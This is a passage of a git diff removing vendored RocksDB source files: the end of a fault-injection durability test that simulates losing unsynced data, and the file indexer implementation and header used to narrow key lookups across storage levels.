-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright 2014 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// This test uses a custom Env to keep track of the state of a filesystem as of
-// the last "sync". It then checks for data loss errors by purposely dropping
-// file data (or entire files) not protected by a "sync".
-
-#include "db/db_impl.h"
-#include "db/log_format.h"
-#include "db/version_set.h"
-#include "env/mock_env.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/table.h"
-#include "rocksdb/write_batch.h"
-#include "util/fault_injection_test_env.h"
-#include "util/filename.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-static const int kValueSize = 1000;
-static const int kMaxNumValues = 2000;
-static const size_t kNumIterations = 3;
-
-class FaultInjectionTest : public testing::Test,
-                           public testing::WithParamInterface<bool> {
- protected:
-  enum OptionConfig {
-    kDefault,
-    kDifferentDataDir,
-    kWalDir,
-    kSyncWal,
-    kWalDirSyncWal,
-    kMultiLevels,
-    kEnd,
-  };
-  int option_config_;
-  // When need to make sure data is persistent, sync WAL
-  bool sync_use_wal_;
-  // When need to make sure data is persistent, call DB::CompactRange()
-  bool sync_use_compact_;
-
-  bool sequential_order_;
-
- protected:
- public:
-  enum ExpectedVerifResult { kValExpectFound, kValExpectNoError };
-  enum ResetMethod {
-    kResetDropUnsyncedData,
-    kResetDropRandomUnsyncedData,
-    kResetDeleteUnsyncedFiles,
-    kResetDropAndDeleteUnsynced
-  };
-
-  std::unique_ptr<Env> base_env_;
-  FaultInjectionTestEnv* env_;
-  std::string dbname_;
-  shared_ptr<Cache> tiny_cache_;
-  Options options_;
-  DB* db_;
-
-  FaultInjectionTest()
-      : option_config_(kDefault),
-        sync_use_wal_(false),
-        sync_use_compact_(true),
-        base_env_(nullptr),
-        env_(NULL),
-        db_(NULL) {
-  }
-
-  ~FaultInjectionTest() {
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-    rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-  }
-
-  bool ChangeOptions() {
-    option_config_++;
-    if (option_config_ >= kEnd) {
-      return false;
-    } else {
-      if (option_config_ == kMultiLevels) {
-        base_env_.reset(new MockEnv(Env::Default()));
-      }
-      return true;
-    }
-  }
-
-  // Return the current option configuration.
-  Options CurrentOptions() {
-    sync_use_wal_ = false;
-    sync_use_compact_ = true;
-    Options options;
-    switch (option_config_) {
-      case kWalDir:
-        options.wal_dir = test::TmpDir(env_) + "/fault_test_wal";
-        break;
-      case kDifferentDataDir:
-        options.db_paths.emplace_back(test::TmpDir(env_) + "/fault_test_data",
-                                      1000000U);
-        break;
-      case kSyncWal:
-        sync_use_wal_ = true;
-        sync_use_compact_ = false;
-        break;
-      case kWalDirSyncWal:
-        options.wal_dir = test::TmpDir(env_) + "/fault_test_wal";
-        sync_use_wal_ = true;
-        sync_use_compact_ = false;
-        break;
-      case kMultiLevels:
-        options.write_buffer_size = 64 * 1024;
-        options.target_file_size_base = 64 * 1024;
-        options.level0_file_num_compaction_trigger = 2;
-        options.level0_slowdown_writes_trigger = 2;
-        options.level0_stop_writes_trigger = 4;
-        options.max_bytes_for_level_base = 128 * 1024;
-        options.max_write_buffer_number = 2;
-        options.max_background_compactions = 8;
-        options.max_background_flushes = 8;
-        sync_use_wal_ = true;
-        sync_use_compact_ = false;
-        break;
-      default:
-        break;
-    }
-    return options;
-  }
-
-  Status NewDB() {
-    assert(db_ == NULL);
-    assert(tiny_cache_ == nullptr);
-    assert(env_ == NULL);
-
-    env_ =
-        new FaultInjectionTestEnv(base_env_ ? base_env_.get() : Env::Default());
-
-    options_ = CurrentOptions();
-    options_.env = env_;
-    options_.paranoid_checks = true;
-
-    BlockBasedTableOptions table_options;
-    tiny_cache_ = NewLRUCache(100);
-    table_options.block_cache = tiny_cache_;
-    options_.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-    dbname_ = test::TmpDir() + "/fault_test";
-
-    EXPECT_OK(DestroyDB(dbname_, options_));
-
-    options_.create_if_missing = true;
-    Status s = OpenDB();
-    options_.create_if_missing = false;
-    return s;
-  }
-
-  void SetUp() override {
-    sequential_order_ = GetParam();
-    ASSERT_OK(NewDB());
-  }
-
-  void TearDown() override {
-    CloseDB();
-
-    Status s = DestroyDB(dbname_, options_);
-
-    delete env_;
-    env_ = NULL;
-
-    tiny_cache_.reset();
-
-    ASSERT_OK(s);
-  }
-
-  void Build(const WriteOptions& write_options, int start_idx, int num_vals) {
-    std::string key_space, value_space;
-    WriteBatch batch;
-    for (int i = start_idx; i < start_idx + num_vals; i++) {
-      Slice key = Key(i, &key_space);
-      batch.Clear();
-      batch.Put(key, Value(i, &value_space));
-      ASSERT_OK(db_->Write(write_options, &batch));
-    }
-  }
-
-  Status ReadValue(int i, std::string* val) const {
-    std::string key_space, value_space;
-    Slice key = Key(i, &key_space);
-    Value(i, &value_space);
-    ReadOptions options;
-    return db_->Get(options, key, val);
-  }
-
-  Status Verify(int start_idx, int num_vals,
-                ExpectedVerifResult expected) const {
-    std::string val;
-    std::string value_space;
-    Status s;
-    for (int i = start_idx; i < start_idx + num_vals && s.ok(); i++) {
-      Value(i, &value_space);
-      s = ReadValue(i, &val);
-      if (s.ok()) {
-        EXPECT_EQ(value_space, val);
-      }
-      if (expected == kValExpectFound) {
-        if (!s.ok()) {
-          fprintf(stderr, "Error when read %dth record (expect found): %s\n", i,
-                  s.ToString().c_str());
-          return s;
-        }
-      } else if (!s.ok() && !s.IsNotFound()) {
-        fprintf(stderr, "Error when read %dth record: %s\n", i,
-                s.ToString().c_str());
-        return s;
-      }
-    }
-    return Status::OK();
-  }
-
-#ifdef ROCKSDB_UBSAN_RUN
-#if defined(__clang__)
-__attribute__((__no_sanitize__("shift"), no_sanitize("signed-integer-overflow")))
-#elif defined(__GNUC__)
-__attribute__((__no_sanitize_undefined__))
-#endif
-#endif
-  // Return the ith key
-  Slice Key(int i, std::string* storage) const {
-    int num = i;
-    if (!sequential_order_) {
-      // random transfer
-      const int m = 0x5bd1e995;
-      num *= m;
-      num ^= num << 24;
-    }
-    char buf[100];
-    snprintf(buf, sizeof(buf), "%016d", num);
-    storage->assign(buf, strlen(buf));
-    return Slice(*storage);
-  }
-
-  // Return the value to associate with the specified key
-  Slice Value(int k, std::string* storage) const {
-    Random r(k);
-    return test::RandomString(&r, kValueSize, storage);
-  }
-
-  void CloseDB() {
-    delete db_;
-    db_ = nullptr;
-  }
-
-  Status OpenDB() {
-    CloseDB();
-    env_->ResetState();
-    Status s = DB::Open(options_, dbname_, &db_);
-    assert(db_ != nullptr);
-    return s;
-  }
-
-  void DeleteAllData() {
-    Iterator* iter = db_->NewIterator(ReadOptions());
-    WriteOptions options;
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_OK(db_->Delete(WriteOptions(), iter->key()));
-    }
-
-    delete iter;
-
-    FlushOptions flush_options;
-    flush_options.wait = true;
-    db_->Flush(flush_options);
-  }
-
-  // rnd cannot be null for kResetDropRandomUnsyncedData
-  void ResetDBState(ResetMethod reset_method, Random* rnd = nullptr) {
-    env_->AssertNoOpenFile();
-    switch (reset_method) {
-      case kResetDropUnsyncedData:
-        ASSERT_OK(env_->DropUnsyncedFileData());
-        break;
-      case kResetDropRandomUnsyncedData:
-        ASSERT_OK(env_->DropRandomUnsyncedFileData(rnd));
-        break;
-      case kResetDeleteUnsyncedFiles:
-        ASSERT_OK(env_->DeleteFilesCreatedAfterLastDirSync());
-        break;
-      case kResetDropAndDeleteUnsynced:
-        ASSERT_OK(env_->DropUnsyncedFileData());
-        ASSERT_OK(env_->DeleteFilesCreatedAfterLastDirSync());
-        break;
-      default:
-        assert(false);
-    }
-  }
-
-  void PartialCompactTestPreFault(int num_pre_sync, int num_post_sync) {
-    DeleteAllData();
-
-    WriteOptions write_options;
-    write_options.sync = sync_use_wal_;
-
-    Build(write_options, 0, num_pre_sync);
-    if (sync_use_compact_) {
-      db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    }
-    write_options.sync = false;
-    Build(write_options, num_pre_sync, num_post_sync);
-  }
-
-  void PartialCompactTestReopenWithFault(ResetMethod reset_method,
-                                         int num_pre_sync, int num_post_sync,
-                                         Random* rnd = nullptr) {
-    env_->SetFilesystemActive(false);
-    CloseDB();
-    ResetDBState(reset_method, rnd);
-    ASSERT_OK(OpenDB());
-    ASSERT_OK(Verify(0, num_pre_sync, FaultInjectionTest::kValExpectFound));
-    ASSERT_OK(Verify(num_pre_sync, num_post_sync,
-                     FaultInjectionTest::kValExpectNoError));
-    WaitCompactionFinish();
-    ASSERT_OK(Verify(0, num_pre_sync, FaultInjectionTest::kValExpectFound));
-    ASSERT_OK(Verify(num_pre_sync, num_post_sync,
-                     FaultInjectionTest::kValExpectNoError));
-  }
-
-  void NoWriteTestPreFault() {
-  }
-
-  void NoWriteTestReopenWithFault(ResetMethod reset_method) {
-    CloseDB();
-    ResetDBState(reset_method);
-    ASSERT_OK(OpenDB());
-  }
-
-  void WaitCompactionFinish() {
-    static_cast<DBImpl*>(db_->GetRootDB())->TEST_WaitForCompact();
-    ASSERT_OK(db_->Put(WriteOptions(), "", ""));
-  }
-};
-
-TEST_P(FaultInjectionTest, FaultTest) {
-  do {
-    Random rnd(301);
-
-    for (size_t idx = 0; idx < kNumIterations; idx++) {
-      int num_pre_sync = rnd.Uniform(kMaxNumValues);
-      int num_post_sync = rnd.Uniform(kMaxNumValues);
-
-      PartialCompactTestPreFault(num_pre_sync, num_post_sync);
-      PartialCompactTestReopenWithFault(kResetDropUnsyncedData, num_pre_sync,
-                                        num_post_sync);
-      NoWriteTestPreFault();
-      NoWriteTestReopenWithFault(kResetDropUnsyncedData);
-
-      PartialCompactTestPreFault(num_pre_sync, num_post_sync);
-      PartialCompactTestReopenWithFault(kResetDropRandomUnsyncedData,
-                                        num_pre_sync, num_post_sync, &rnd);
-      NoWriteTestPreFault();
-      NoWriteTestReopenWithFault(kResetDropUnsyncedData);
-
-      // Setting a separate data path won't pass the test as we don't sync
-      // it after creating new files,
-      PartialCompactTestPreFault(num_pre_sync, num_post_sync);
-      PartialCompactTestReopenWithFault(kResetDropAndDeleteUnsynced,
-                                        num_pre_sync, num_post_sync);
-      NoWriteTestPreFault();
-      NoWriteTestReopenWithFault(kResetDropAndDeleteUnsynced);
-
-      PartialCompactTestPreFault(num_pre_sync, num_post_sync);
-      // No new files created so we expect all values since no files will be
-      // dropped.
-      PartialCompactTestReopenWithFault(kResetDeleteUnsyncedFiles, num_pre_sync,
-                                        num_post_sync);
-      NoWriteTestPreFault();
-      NoWriteTestReopenWithFault(kResetDeleteUnsyncedFiles);
-    }
-  } while (ChangeOptions());
-}
-
-// Previous log file is not fsynced if sync is forced after log rolling.
-TEST_P(FaultInjectionTest, WriteOptionSyncTest) {
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  // Block the job queue to prevent flush job from running.
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::HIGH);
-  sleeping_task_low.WaitUntilSleeping();
-
-  WriteOptions write_options;
-  write_options.sync = false;
-
-  std::string key_space, value_space;
-  ASSERT_OK(
-      db_->Put(write_options, Key(1, &key_space), Value(1, &value_space)));
-  FlushOptions flush_options;
-  flush_options.wait = false;
-  ASSERT_OK(db_->Flush(flush_options));
-  write_options.sync = true;
-  ASSERT_OK(
-      db_->Put(write_options, Key(2, &key_space), Value(2, &value_space)));
-  db_->FlushWAL(false);
-
-  env_->SetFilesystemActive(false);
-  NoWriteTestReopenWithFault(kResetDropAndDeleteUnsynced);
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-
-  ASSERT_OK(OpenDB());
-  std::string val;
-  Value(2, &value_space);
-  ASSERT_OK(ReadValue(2, &val));
-  ASSERT_EQ(value_space, val);
-
-  Value(1, &value_space);
-  ASSERT_OK(ReadValue(1, &val));
-  ASSERT_EQ(value_space, val);
-}
-
-TEST_P(FaultInjectionTest, UninstalledCompaction) {
-  options_.target_file_size_base = 32 * 1024;
-  options_.write_buffer_size = 100 << 10;  // 100KB
-  options_.level0_file_num_compaction_trigger = 6;
-  options_.level0_stop_writes_trigger = 1 << 10;
-  options_.level0_slowdown_writes_trigger = 1 << 10;
-  options_.max_background_compactions = 1;
-  OpenDB();
-
-  if (!sequential_order_) {
-    rocksdb::SyncPoint::GetInstance()->LoadDependency({
-        {"FaultInjectionTest::FaultTest:0", "DBImpl::BGWorkCompaction"},
-        {"CompactionJob::Run():End", "FaultInjectionTest::FaultTest:1"},
-        {"FaultInjectionTest::FaultTest:2",
-         "DBImpl::BackgroundCompaction:NonTrivial:AfterRun"},
-    });
-  }
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  int kNumKeys = 1000;
-  Build(WriteOptions(), 0, kNumKeys);
-  FlushOptions flush_options;
-  flush_options.wait = true;
-  db_->Flush(flush_options);
-  ASSERT_OK(db_->Put(WriteOptions(), "", ""));
-  TEST_SYNC_POINT("FaultInjectionTest::FaultTest:0");
-  TEST_SYNC_POINT("FaultInjectionTest::FaultTest:1");
-  env_->SetFilesystemActive(false);
-  TEST_SYNC_POINT("FaultInjectionTest::FaultTest:2");
-  CloseDB();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ResetDBState(kResetDropUnsyncedData);
-
-  std::atomic<bool> opened(false);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::Open:Opened", [&](void* arg) { opened.store(true); });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BGWorkCompaction",
-      [&](void* arg) { ASSERT_TRUE(opened.load()); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  ASSERT_OK(OpenDB());
-  ASSERT_OK(Verify(0, kNumKeys, FaultInjectionTest::kValExpectFound));
-  WaitCompactionFinish();
-  ASSERT_OK(Verify(0, kNumKeys, FaultInjectionTest::kValExpectFound));
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-}
-
-TEST_P(FaultInjectionTest, ManualLogSyncTest) {
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  // Block the job queue to prevent flush job from running.
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::HIGH);
-  sleeping_task_low.WaitUntilSleeping();
-
-  WriteOptions write_options;
-  write_options.sync = false;
-
-  std::string key_space, value_space;
-  ASSERT_OK(
-      db_->Put(write_options, Key(1, &key_space), Value(1, &value_space)));
-  FlushOptions flush_options;
-  flush_options.wait = false;
-  ASSERT_OK(db_->Flush(flush_options));
-  ASSERT_OK(
-      db_->Put(write_options, Key(2, &key_space), Value(2, &value_space)));
-  ASSERT_OK(db_->FlushWAL(true));
-
-  env_->SetFilesystemActive(false);
-  NoWriteTestReopenWithFault(kResetDropAndDeleteUnsynced);
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-
-  ASSERT_OK(OpenDB());
-  std::string val;
-  Value(2, &value_space);
-  ASSERT_OK(ReadValue(2, &val));
-  ASSERT_EQ(value_space, val);
-
-  Value(1, &value_space);
-  ASSERT_OK(ReadValue(1, &val));
-  ASSERT_EQ(value_space, val);
-}
-
-TEST_P(FaultInjectionTest, WriteBatchWalTerminationTest) {
-  ReadOptions ro;
-  Options options = CurrentOptions();
-  options.env = env_;
-
-  WriteOptions wo;
-  wo.sync = true;
-  wo.disableWAL = false;
-  WriteBatch batch;
-  batch.Put("cats", "dogs");
-  batch.MarkWalTerminationPoint();
-  batch.Put("boys", "girls");
-  ASSERT_OK(db_->Write(wo, &batch));
-
-  env_->SetFilesystemActive(false);
-  NoWriteTestReopenWithFault(kResetDropAndDeleteUnsynced);
-  ASSERT_OK(OpenDB());
-
-  std::string val;
-  ASSERT_OK(db_->Get(ro, "cats", &val));
-  ASSERT_EQ("dogs", val);
-  ASSERT_EQ(db_->Get(ro, "boys", &val), Status::NotFound());
-}
-
-INSTANTIATE_TEST_CASE_P(FaultTest, FaultInjectionTest, ::testing::Bool());
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/file_indexer.cc b/thirdparty/rocksdb/db/file_indexer.cc
deleted file mode 100644
index abfa7cf..0000000
--- a/thirdparty/rocksdb/db/file_indexer.cc
+++ /dev/null
@@ -1,214 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/file_indexer.h"
-#include <algorithm>
-#include <functional>
-#include "db/version_edit.h"
-#include "rocksdb/comparator.h"
-
-namespace rocksdb {
-
-FileIndexer::FileIndexer(const Comparator* ucmp)
-    : num_levels_(0), ucmp_(ucmp), level_rb_(nullptr) {}
-
-size_t FileIndexer::NumLevelIndex() const { return next_level_index_.size(); }
-
-size_t FileIndexer::LevelIndexSize(size_t level) const {
-  if (level >= next_level_index_.size()) {
-    return 0;
-  }
-  return next_level_index_[level].num_index;
-}
-
-void FileIndexer::GetNextLevelIndex(const size_t level, const size_t file_index,
-                                    const int cmp_smallest,
-                                    const int cmp_largest, int32_t* left_bound,
-                                    int32_t* right_bound) const {
-  assert(level > 0);
-
-  // Last level, no hint
-  if (level == num_levels_ - 1) {
-    *left_bound = 0;
-    *right_bound = -1;
-    return;
-  }
-
-  assert(level < num_levels_ - 1);
-  assert(static_cast<int32_t>(file_index) <= level_rb_[level]);
-
-  const IndexUnit* index_units = next_level_index_[level].index_units;
-  const auto& index = index_units[file_index];
-
-  if (cmp_smallest < 0) {
-    *left_bound = (level > 0 && file_index > 0)
-                      ? index_units[file_index - 1].largest_lb
-                      : 0;
-    *right_bound = index.smallest_rb;
-  } else if (cmp_smallest == 0) {
-    *left_bound = index.smallest_lb;
-    *right_bound = index.smallest_rb;
-  } else if (cmp_smallest > 0 && cmp_largest < 0) {
-    *left_bound = index.smallest_lb;
-    *right_bound = index.largest_rb;
-  } else if (cmp_largest == 0) {
-    *left_bound = index.largest_lb;
-    *right_bound = index.largest_rb;
-  } else if (cmp_largest > 0) {
-    *left_bound = index.largest_lb;
-    *right_bound = level_rb_[level + 1];
-  } else {
-    assert(false);
-  }
-
-  assert(*left_bound >= 0);
-  assert(*left_bound <= *right_bound + 1);
-  assert(*right_bound <= level_rb_[level + 1]);
-}
-
-void FileIndexer::UpdateIndex(Arena* arena, const size_t num_levels,
-                              std::vector<FileMetaData*>* const files) {
-  if (files == nullptr) {
-    return;
-  }
-  if (num_levels == 0) {  // uint_32 0-1 would cause bad behavior
-    num_levels_ = num_levels;
-    return;
-  }
-  assert(level_rb_ == nullptr);  // level_rb_ should be init here
-
-  num_levels_ = num_levels;
-  next_level_index_.resize(num_levels);
-
-  char* mem = arena->AllocateAligned(num_levels_ * sizeof(int32_t));
-  level_rb_ = new (mem) int32_t[num_levels_];
-  for (size_t i = 0; i < num_levels_; i++) {
-    level_rb_[i] = -1;
-  }
-
-  // L1 - Ln-1
-  for (size_t level = 1; level < num_levels_ - 1; ++level) {
-    const auto& upper_files = files[level];
-    const int32_t upper_size = static_cast<int32_t>(upper_files.size());
-    const auto& lower_files = files[level + 1];
-    level_rb_[level] = static_cast<int32_t>(upper_files.size()) - 1;
-    if (upper_size == 0) {
-      continue;
-    }
-    IndexLevel& index_level = next_level_index_[level];
-    index_level.num_index = upper_size;
-    mem = arena->AllocateAligned(upper_size * sizeof(IndexUnit));
-    index_level.index_units = new (mem) IndexUnit[upper_size];
-
-    CalculateLB(
-        upper_files, lower_files, &index_level,
-        [this](const FileMetaData * a, const FileMetaData * b)->int {
-          return ucmp_->Compare(a->smallest.user_key(), b->largest.user_key());
-        },
-        [](IndexUnit* index, int32_t f_idx) { index->smallest_lb = f_idx; });
-    CalculateLB(
-        upper_files, lower_files, &index_level,
-        [this](const FileMetaData * a, const FileMetaData * b)->int {
-          return ucmp_->Compare(a->largest.user_key(), b->largest.user_key());
-        },
-        [](IndexUnit* index, int32_t f_idx) { index->largest_lb = f_idx; });
-    CalculateRB(
-        upper_files, lower_files, &index_level,
-        [this](const FileMetaData * a, const FileMetaData * b)->int {
-          return ucmp_->Compare(a->smallest.user_key(), b->smallest.user_key());
-        },
-        [](IndexUnit* index, int32_t f_idx) { index->smallest_rb = f_idx; });
-    CalculateRB(
-        upper_files, lower_files, &index_level,
-        [this](const FileMetaData * a, const FileMetaData * b)->int {
-          return ucmp_->Compare(a->largest.user_key(), b->smallest.user_key());
-        },
-        [](IndexUnit* index, int32_t f_idx) { index->largest_rb = f_idx; });
-  }
-
-  level_rb_[num_levels_ - 1] =
-      static_cast<int32_t>(files[num_levels_ - 1].size()) - 1;
-}
-
-void FileIndexer::CalculateLB(
-    const std::vector<FileMetaData*>& upper_files,
-    const std::vector<FileMetaData*>& lower_files, IndexLevel* index_level,
-    std::function<int(const FileMetaData*, const FileMetaData*)> cmp_op,
-    std::function<void(IndexUnit*, int32_t)> set_index) {
-  const int32_t upper_size = static_cast<int32_t>(upper_files.size());
-  const int32_t lower_size = static_cast<int32_t>(lower_files.size());
-  int32_t upper_idx = 0;
-  int32_t lower_idx = 0;
-
-  IndexUnit* index = index_level->index_units;
-  while (upper_idx < upper_size && lower_idx < lower_size) {
-    int cmp = cmp_op(upper_files[upper_idx], lower_files[lower_idx]);
-
-    if (cmp == 0) {
-      set_index(&index[upper_idx], lower_idx);
-      ++upper_idx;
-      ++lower_idx;
-    } else if (cmp > 0) {
-      // Lower level's file (largest) is smaller, a key won't hit in that
-      // file. Move to next lower file
-      ++lower_idx;
-    } else {
-      // Lower level's file becomes larger, update the index, and
-      // move to the next upper file
-      set_index(&index[upper_idx], lower_idx);
-      ++upper_idx;
-    }
-  }
-
-  while (upper_idx < upper_size) {
-    // Lower files are exhausted, that means the remaining upper files are
-    // greater than any lower files. Set the index to be the lower level size.
-    set_index(&index[upper_idx], lower_size);
-    ++upper_idx;
-  }
-}
-
-void FileIndexer::CalculateRB(
-    const std::vector<FileMetaData*>& upper_files,
-    const std::vector<FileMetaData*>& lower_files, IndexLevel* index_level,
-    std::function<int(const FileMetaData*, const FileMetaData*)> cmp_op,
-    std::function<void(IndexUnit*, int32_t)> set_index) {
-  const int32_t upper_size = static_cast<int32_t>(upper_files.size());
-  const int32_t lower_size = static_cast<int32_t>(lower_files.size());
-  int32_t upper_idx = upper_size - 1;
-  int32_t lower_idx = lower_size - 1;
-
-  IndexUnit* index = index_level->index_units;
-  while (upper_idx >= 0 && lower_idx >= 0) {
-    int cmp = cmp_op(upper_files[upper_idx], lower_files[lower_idx]);
-
-    if (cmp == 0) {
-      set_index(&index[upper_idx], lower_idx);
-      --upper_idx;
-      --lower_idx;
-    } else if (cmp < 0) {
-      // Lower level's file (smallest) is larger, a key won't hit in that
-      // file. Move to next lower file.
-      --lower_idx;
-    } else {
-      // Lower level's file becomes smaller, update the index, and move to
-      // the next the upper file
-      set_index(&index[upper_idx], lower_idx);
-      --upper_idx;
-    }
-  }
-  while (upper_idx >= 0) {
-    // Lower files are exhausted, that means the remaining upper files are
-    // smaller than any lower files. Set it to -1.
-    set_index(&index[upper_idx], -1);
-    --upper_idx;
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/file_indexer.h b/thirdparty/rocksdb/db/file_indexer.h
deleted file mode 100644
index 1bef3aa..0000000
--- a/thirdparty/rocksdb/db/file_indexer.h
+++ /dev/null
@@ -1,142 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <cstdint>
-#include <functional>
-#include <limits>
-#include <vector>
-#include "port/port.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class Comparator;
-struct FileMetaData;
-struct FdWithKeyRange;
-struct FileLevel;
-
-// The file tree structure in Version is prebuilt and the range of each file
-// is known. On Version::Get(), it uses binary search to find a potential file
-// and then check if a target key can be found in the file by comparing the key
-// to each file's smallest and largest key. The results of these comparisons
-// can be reused beyond checking if a key falls into a file's range.
-// With some pre-calculated knowledge, each key comparison that has been done
-// can serve as a hint to narrow down further searches: if a key compared to
-// be smaller than a file's smallest or largest, that comparison can be used
-// to find out the right bound of next binary search. Similarly, if a key
-// compared to be larger than a file's smallest or largest, it can be utilized
-// to find out the left bound of next binary search.
-// With these hints: it can greatly reduce the range of binary search,
-// especially for bottom levels, given that one file most likely overlaps with
-// only N files from level below (where N is max_bytes_for_level_multiplier).
-// So on level L, we will only look at ~N files instead of N^L files on the
-// naive approach.
-class FileIndexer {
- public:
-  explicit FileIndexer(const Comparator* ucmp);
-
-  size_t NumLevelIndex() const;
-
-  size_t LevelIndexSize(size_t level) const;
-
-  // Return a file index range in the next level to search for a key based on
-  // smallest and largest key comparison for the current file specified by
-  // level and file_index. When *left_index < *right_index, both index should
-  // be valid and fit in the vector size.
-  void GetNextLevelIndex(const size_t level, const size_t file_index,
-                         const int cmp_smallest, const int cmp_largest,
-                         int32_t* left_bound, int32_t* right_bound) const;
-
-  void UpdateIndex(Arena* arena, const size_t num_levels,
-                   std::vector<FileMetaData*>* const files);
-
-  enum {
-    // MSVC version 1800 still does not have constexpr for ::max()
-    kLevelMaxIndex = rocksdb::port::kMaxInt32
-  };
-
- private:
-  size_t num_levels_;
-  const Comparator* ucmp_;
-
-  struct IndexUnit {
-    IndexUnit()
-      : smallest_lb(0), largest_lb(0), smallest_rb(-1), largest_rb(-1) {}
-    // During file search, a key is compared against smallest and largest
-    // from a FileMetaData. It can have 3 possible outcomes:
-    // (1) key is smaller than smallest, implying it is also smaller than
-    //     larger. Precalculated index based on "smallest < smallest" can
-    //     be used to provide right bound.
-    // (2) key is in between smallest and largest.
-    //     Precalculated index based on "smallest > greatest" can be used to
-    //     provide left bound.
-    //     Precalculated index based on "largest < smallest" can be used to
-    //     provide right bound.
-    // (3) key is larger than largest, implying it is also larger than smallest.
-    //     Precalculated index based on "largest > largest" can be used to
-    //     provide left bound.
-    //
-    // As a result, we will need to do:
-    // Compare smallest (<=) and largest keys from upper level file with
-    // smallest key from lower level to get a right bound.
-    // Compare smallest (>=) and largest keys from upper level file with
-    // largest key from lower level to get a left bound.
-    //
-    // Example:
-    //    level 1:              [50 - 60]
-    //    level 2:        [1 - 40], [45 - 55], [58 - 80]
-    // A key 35, compared to be less than 50, 3rd file on level 2 can be
-    // skipped according to rule (1). LB = 0, RB = 1.
-    // A key 53, sits in the middle 50 and 60. 1st file on level 2 can be
-    // skipped according to rule (2)-a, but the 3rd file cannot be skipped
-    // because 60 is greater than 58. LB = 1, RB = 2.
-    // A key 70, compared to be larger than 60. 1st and 2nd file can be skipped
-    // according to rule (3). LB = 2, RB = 2.
-    //
-    // Point to a left most file in a lower level that may contain a key,
-    // which compares greater than smallest of a FileMetaData (upper level)
-    int32_t smallest_lb;
-    // Point to a left most file in a lower level that may contain a key,
-    // which compares greater than largest of a FileMetaData (upper level)
-    int32_t largest_lb;
-    // Point to a right most file in a lower level that may contain a key,
-    // which compares smaller than smallest of a FileMetaData (upper level)
-    int32_t smallest_rb;
-    // Point to a right most file in a lower level that may contain a key,
-    // which compares smaller than largest of a FileMetaData (upper level)
-    int32_t largest_rb;
-  };
-
-  // Data structure to store IndexUnits in a whole level
-  struct IndexLevel {
-    size_t num_index;
-    IndexUnit* index_units;
-
-    IndexLevel() : num_index(0), index_units(nullptr) {}
-  };
-
-  void CalculateLB(
-      const std::vector<FileMetaData*>& upper_files,
-      const std::vector<FileMetaData*>& lower_files, IndexLevel* index_level,
-      std::function<int(const FileMetaData*, const FileMetaData*)> cmp_op,
-      std::function<void(IndexUnit*, int32_t)> set_index);
-
-  void CalculateRB(
-      const std::vector<FileMetaData*>& upper_files,
-      const std::vector<FileMetaData*>& lower_files, IndexLevel* index_level,
-      std::function<int(const FileMetaData*, const FileMetaData*)> cmp_op,
-      std::function<void(IndexUnit*, int32_t)> set_index);
-
-  autovector<IndexLevel> next_level_index_;
-  int32_t* level_rb_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/file_indexer_test.cc b/thirdparty/rocksdb/db/file_indexer_test.cc
deleted file mode 100644
index 5cd8c2d..0000000
--- a/thirdparty/rocksdb/db/file_indexer_test.cc
+++ /dev/null
@@ -1,350 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
